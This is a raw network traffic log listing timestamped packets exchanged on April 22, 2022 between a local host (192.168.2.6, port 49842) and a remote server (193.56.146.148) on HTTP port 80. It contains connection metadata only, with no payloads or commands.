Apr 22, 2022 16:17:42.561829090 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561850071 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561865091 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561875105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561897993 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561908007 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561920881 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561943054 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561953068 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561966896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561984062 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561990023 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562011003 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562014103 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562033892 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562056065 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562062979 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562081099 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562103987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562108994 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562127113 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562134981 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562149048 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562187910 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562187910 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562211990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562213898 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562242985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562251091 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562266111 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562275887 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562289000 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562306881 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562310934 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562333107 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562345028 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562355995 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562377930 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562388897 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562403917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562427998 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562438011 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562452078 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562469006 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562482119 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562505007 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562529087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562531948 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562551975 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562561989 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562573910 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562597036 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562618971 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562624931 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562640905 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562663078 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562669039 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562685966 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562695026 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562709093 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562732935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562738895 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562755108 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562781096 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562784910 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562803984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562814951 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562824965 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562848091 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562856913 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562870026 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562892914 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562902927 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562916040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562927961 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562937975 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562961102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.562973022 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.562983036 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.563007116 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.563015938 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.563029051 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.563049078 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.563051939 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.563076019 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.563076973 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.563100100 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.563122034 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.563122988 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.563169956 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.633024931 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633109093 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633163929 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633220911 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633220911 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.633560896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633620024 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633677006 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633734941 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633794069 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633852959 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633908987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.633965015 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634021997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634076118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634131908 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634212971 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634269953 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634326935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634383917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634417057 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634423971 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634426117 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634428978 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634430885 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634434938 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634437084 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634438992 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634438992 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634442091 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634443998 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634445906 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634464979 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634496927 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634502888 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634557009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634562016 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634613037 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634619951 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634669065 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634717941 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634725094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634747028 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634782076 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634819031 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634840012 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634851933 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634893894 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634931087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634957075 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.634985924 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.634999990 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635041952 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635096073 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635154009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635210991 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635268927 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635310888 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635317087 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635318995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635324955 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635380983 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635390997 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635438919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635441065 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635493040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635504961 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635550022 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635550976 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635606050 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635613918 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635663986 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635723114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635724068 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635752916 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635776043 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635827065 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635831118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635847092 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635889053 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635893106 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635943890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.635950089 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635998964 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.635999918 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636054039 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636110067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636115074 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636167049 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636171103 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636220932 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636229038 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636276007 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636329889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636384010 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636436939 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636437893 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636441946 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636456966 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636492968 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636493921 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636548996 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636552095 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636609077 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636610031 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636662006 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636662960 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636718988 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.636723995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.636782885 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.706576109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706614017 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706636906 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706660986 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706685066 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706708908 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706732988 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706765890 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.706818104 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.706909895 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706963062 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.706967115 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.706990957 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.707014084 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.707017899 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.707037926 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.707046986 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.707086086 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.707099915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.707123041 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.707151890 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.707284927 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.777187109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.779591084 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.801275969 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.871871948 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.871933937 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.871953011 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.871968985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.871987104 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872004032 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872021914 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872021914 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872056961 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872066975 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872085094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872095108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872102022 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872119904 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872123957 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872137070 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872148991 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872153044 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872169971 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872190952 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872206926 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872225046 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872237921 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872241974 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872260094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872266054 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872277021 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872292995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872293949 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872311115 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872318983 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872351885 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872358084 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872381926 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872401953 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872416973 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872421980 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872477055 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872478962 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872495890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872512102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872524023 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872546911 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872553110 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872565985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872582912 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872601032 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872603893 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872627020 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872641087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872652054 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872661114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872678041 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872688055 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872695923 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872711897 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872731924 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872750044 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872750998 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872769117 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872783899 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872785091 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872802973 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872809887 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872837067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872840881 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872853994 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872859955 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872872114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872889996 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872895956 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872925997 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872925997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872945070 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872958899 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872961044 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872978926 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.872988939 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.872997046 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873017073 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873038054 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873044014 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873055935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873075008 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873084068 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873091936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873121023 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873131037 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873145103 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873147964 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873164892 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873171091 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873183012 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873195887 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873223066 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873224974 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873245001 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873262882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873267889 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873280048 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873318911 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873320103 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873337984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873354912 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873366117 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873392105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873408079 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873410940 CEST	80	49842	193.56.146.148	192.168.2.6
